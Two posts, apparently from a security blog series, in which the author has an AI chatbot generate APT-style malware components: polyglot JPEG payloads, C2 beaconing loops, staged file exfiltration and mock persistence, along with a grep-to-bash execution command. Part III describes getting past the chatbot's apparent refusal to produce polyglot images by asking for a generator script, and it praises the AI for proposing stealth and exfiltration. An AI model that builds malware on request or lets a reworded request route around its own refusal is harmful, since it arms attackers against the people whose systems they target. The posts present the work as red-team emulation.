Reading view

There are new articles available, click to refresh the page.

The One-Man APT with Artificial Intelligence, Part III: From Zero to Local Dominance

By: Smouk

With in-memory execution and simulated exfiltration already in place, the next step was obvious: persistence. Advanced threats like Koske don’t just run once—they stay alive, blend into the system, and return after every reboot. That’s exactly what I set out to replicate in this phase.

The goal? To see if the AI could not only generate payloads that behave like persistent malware, but also suggest and configure real-world persistence mechanisms like systemd services or .bashrc entries—again, without me writing any code manually.

Let’s see how far the AI can go when asked to survive a reboot.

Simulated Attack Chain: Building Complexity

At this stage, the challenge escalates. Instead of focusing on isolated behaviors like beaconing or exfiltration, I asked the AI to generate a safe, all-in-one payload that could simulate a full attack chain. The idea was to build a structured sequence of actions—like compiling a fake binary, faking persistence, collecting environment data, and retrieving a file—mirroring the complexity of how real APTs like Koske operate.

The AI responded with a well-structured, harmless payload that compiles a dummy C program (fakerootkit), creates a marker file to simulate persistence (persistence_demo.txt), collects system info (cpu_check.txt), and downloads a PDF disguised as a cryptominer. All of this is packed into a polyglot image that can be triggered with a single command—just like earlier stages.

From here on, each request I make builds on the last, and the behavior becomes increasingly layered. This is where the simulation begins to truly reflect the modular, adaptive structure of a real-world APT—only it’s being built entirely through natural language prompts.

Bypassing AI Limitations: Changing the Assembly Vector

As I continued expanding the complexity of the simulation, I hit a wall: the AI stopped generating polyglot images directly, likely due to internal safety filters. But rather than breaking the experiment’s core rule—no manual payload writing—I took a different approach. I asked the AI to give me a Python script that could generate the image locally.

The result was a clean, minimal script that uses the PIL library to create a basic JPEG image, then appends a harmless shell payload that opens a terminal and runs whoami. The AI provided everything: image generation, payload logic, encoding, and the binary append operation—effectively giving me the same polyglot result, just via a different toolchain.

This moment reflected a real-world tactic perfectly: when direct delivery fails, an APT often falls back to alternative methods like packer-based generation or local compilation. Here, the AI simulated that behavior without being asked to—and kept the flow going.

Payload Assembly Without Manual Scripting

To stay within the bounds of the experiment, I didn’t manually write or alter the payload logic. Instead, I simply copied and pasted the code provided by the AI—line by line—into a local environment, using it exactly as delivered. The full simulated attack chain was now assembled via Python: fake binary compilation, mock persistence, system enumeration, and simulated cryptominer download.

This approach preserved the project’s core rule: I was still not writing code myself—the AI was doing all the work. The only difference was that now, instead of delivering a final image, it handed me the blueprints. And in real-world terms, this mimics the shift from payload delivery to toolkits and builders—exactly the kind of modularity we see in modern APT ecosystems like Koske.

Final Execution: Complete Polyglot Delivery Chain

For this phase, the objective was clear: demonstrate a full local execution chain that accurately reflects the behavior of the targeted APT — but using only safe, demonstrative payloads.

This time, the image wasn’t delivered directly. Due to AI restrictions, I adapted the approach by requesting a Python script that would locally generate the final polyglot image. The script would:

  • Create a simple JPEG file
  • Embed the full simulated attack chain as a shell payload

Once executed, the generated image (polyglot_terminal_whoami.jpg) behaved exactly as expected. Upon triggering it with the terminal command:

grep -a -A9999 “# PAYLOAD” polyglot_terminal_whoami.jpg | bash

The image executed a chain that:

  • Compiled a harmless “fakerootkit” binary
  • Simulated persistence via a timestamped text file
  • Collected CPU information into a local dump
  • Downloaded the PDF (“Linux Basics for Hackers 2 ed”) as a stand-in for staged payload delivery

All steps ran in sequence, without errors, cleanly emulating the kind of behavior observed in staged APT attacks — from initial execution, to local recon, to staged download activity.

Summary

This third stage marked a major technical leap in our emulation of the APT’s behavior. Faced with limitations in image payload generation, we adapted by leveraging Python to produce fully functional polyglot JPEGs locally.

The resulting image executed a complete mock attack chain: compiling a fake binary, simulating persistence, collecting system info, and downloading a decoy PDF — each step carefully reflecting the operational flow of the APT. By shifting to script-based generation while maintaining payload integrity, we advanced our alignment with the adversary’s methodology without compromising control or structure.

There’s something else I haven’t revealed yet — in an upcoming entry, I’ll show how, through the same sequence of prompts used in this project, I was able to obtain a fully functional rootkit for Linux. Stay tuned — I’ll be back soon.

Until next time…

Smouk out!

The post The One-Man APT with Artificial Intelligence, Part III: From Zero to Local Dominance first appeared on Hackers Arise.

The One-Man APT – Part II: Stealthy Exfiltration with AI

By: Smouk

In the first part of this project, I explored how artificial intelligence can be used to simulate the early stages of a stealthy APT—focusing on polyglot files, in-memory execution, and basic command-and-control behavior. Everything was generated by the AI: from code to corrections, including full payload packaging inside an image file.

Escalating the Simulation: Persistence Begins

At this stage, I wanted to move faster and explore a critical capability of advanced persistent threats: staying alive. A one-shot payload is interesting, but it doesn’t fully reflect how real threats operate. So I asked the AI to build a more advanced script—one that runs in a continuous loop, mimics beaconing behavior using HTTP headers, includes debugging output, and could be executed in a way that makes it compatible with persistence methods like systemd, nohup, or even cron.


The AI immediately returned a fully working proof-of-concept: a Bash script designed for controlled internal testing, which runs in an infinite loop, sends periodic requests with Range headers, and adapts to the environment based on whether curl or wget is available. It even included a variant that can be run inline—exactly the format needed for integration with persistence services. This wasn’t just a script—it was an adaptable, modular payload ready to be embedded and kept alive.

Iterating for Realism: Improved Loop and Embedded Payload

Once I had the new script with persistent behavior and HTTP Range headers working, I decided to hand it back to the AI to see what it would do next. The goal was to test how well it could take a user-supplied payload and fully encapsulate it into a new polyglot image—one that mimics a real persistence loop, usable with systemd or nohup.

The result was polyglot_improved.jpg, an updated version that runs indefinitely, sending requests every 10 seconds using either curl or wget, and tracking state using byte offsets. The image behaves like a normal file, but under the hood, it continuously simulates C2 beaconing.


More interestingly, the AI didn’t stop there—it immediately offered to enhance the payload further, suggesting features like exfiltration, dynamic target resolution, or stealth. These aren’t just minor tweaks; they’re exactly the kind of behaviors seen in modern malware families and APT toolkits. Once again, the AI wasn’t just building code—it was proactively proposing ways to evolve the attack logic.

Simulating Exfiltration: Moving the Target

At this point, I decided to follow one of the AI’s own suggestions: testing a basic form of exfiltration. I wanted to keep things local and harmless, so I asked it to simulate the process using one of the most iconic files for any security lab— Linux Basics for Hackers 2ed.pdf.
I instructed the AI to generate a payload that would first check for the presence of that file, move it to the ~/Downloads directory, and then initiate the HTTP beaconing loop as before. Within seconds, it produced a new polyglot image—polyglot_exfil.jpg—ready to test.

This step aligns perfectly with typical APT behavior: locating files of interest, staging them, and preparing for exfiltration. While in this case the file didn’t leave the system, the logic mimicked exactly how real malware performs staged data collection before sending it off to a remote listener. The fact that the AI stitched this behavior together so naturally just reinforces the experiment’s core question: how close can AI get to autonomously simulating advanced threat logic?

Debugging the Exfiltration Flow

I tested the new image—polyglot_exfil.jpg—but quickly ran into an issue: the request wasn’t formatted correctly, and the file wasn’t downloaded. Consistent with my approach, I didn’t troubleshoot the code myself. Instead, I described the symptoms to the AI in natural language and asked it to fix the behavior.

It responded with a revised payload embedded in a new image—polyglot_pdf_exfil.jpg. This version was designed to fetch the PDF file directly from an internal server via HTTP, then move it to the ~/Downloads folder using either curl or wget, depending on what was available. The logic was clean, clearly commented, and ready to run.

More importantly, the AI showed an ability to not only identify the bug but also restructure the entire flow, maintaining modularity and adaptability—just like a well-designed malware loader would under real operational constraints.

Finalizing the Exfiltration Payload

Even with the revised version—polyglot_pdf_exfil.jpg—the payload still wasn’t working exactly as intended. The AI had attempted to expand variables like URL and FILENAME within a heredoc, but they weren’t being parsed correctly at runtime, leading to malformed requests.


Again, I avoided editing the code myself. I simply shared the terminal output and a screenshot of the behavior. The AI analyzed the situation and explained the root cause clearly: variable expansion within quoted heredoc blocks fails unless the values are injected beforehand.


The fix? It rewrote the script to inject the actual values before writing the heredoc section—solving the problem elegantly. Then it packaged everything into a new image, polyglot_pdf_fixed.jpg, which successfully downloaded the correct file from the specified URL and saved it locally. This showed that the AI wasn’t just capable of debugging—it was learning context across iterations, adjusting its output to match previous failures. That’s not just automation; it’s adaptation.

Successful Execution: Complete Simulated Exfiltration

This time, everything worked exactly as intended. The image polyglot_pdf_fixed.jpg, when executed, downloaded the target PDF from the internal test server and saved it to the correct destination path using the selected available tool (curl or wget). No syntax errors, no broken variables, no unexpected behavior—just a clean, functional simulation of a staged exfiltration operation.


As shown in the GIF below, the full logic—file check, transfer, and persistent HTTP beaconing—executed smoothly. The payload was fully generated, debugged, corrected, and repackaged by the AI across several iterations. This marked the first complete and autonomous simulation of a full exfiltration flow, built entirely via natural language instructions. No manual scripting. No reverse engineering. Just controlled, replicable behavior… designed by a chatbot.

Summary

In this second phase, the simulation advanced from basic command-and-control logic to staged file exfiltration—entirely generated and corrected by AI. Each step stayed tightly aligned with the real TTPs of the Koske APT: use of polyglot images, in-memory execution, environmental adaptation, and modular payloads.

The AI didn’t just generate scripts—it refined them iteratively, just like an automated APT framework would. With the successful simulation of persistent beaconing and file movement, we’re now one step closer to replicating Koske’s full behavior—ethically, transparently, and with zero manual coding.

Until next time…

Smouk out!

The post The One-Man APT – Part II: Stealthy Exfiltration with AI first appeared on Hackers Arise.

❌